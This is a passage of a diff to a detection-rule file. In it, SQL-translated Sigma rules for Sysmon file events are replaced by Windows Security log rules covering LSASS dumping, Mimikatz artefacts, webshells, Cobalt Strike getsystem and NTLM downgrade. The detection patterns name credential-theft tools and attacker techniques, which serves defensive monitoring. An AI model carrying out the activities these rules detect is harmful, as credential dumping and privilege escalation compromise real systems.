- "attack.t1218" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" 
directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "status": "test", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND 
ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, - { - "title": "Mimikatz Kirbi File Creation", 
- "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + { + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": 
"0b9ad457-2554-44c1-82c2-d56a99c42377", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Dumpert Process Dumper Default File", - 
"id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "Very unlikely" + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - 
"filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", - "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + "description": "Detects an installation of a device that is forbidden by the system policy", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 
'%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADCS Certificate Template Configuration Vulnerability", + "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "status": "test", + "description": "Detects certificate creation with template allowing risk permission subject", + "author": "Orlinum , 
BlueDefenZer", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unlikely" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ 
- "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "External Disk Drive Or USB Storage Device", + "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "status": "test", + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "author": "Keith Wright", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_external_device.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", - "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "status": "experimental", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "System administrators managing certififcates." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of 
persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Unknown" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' 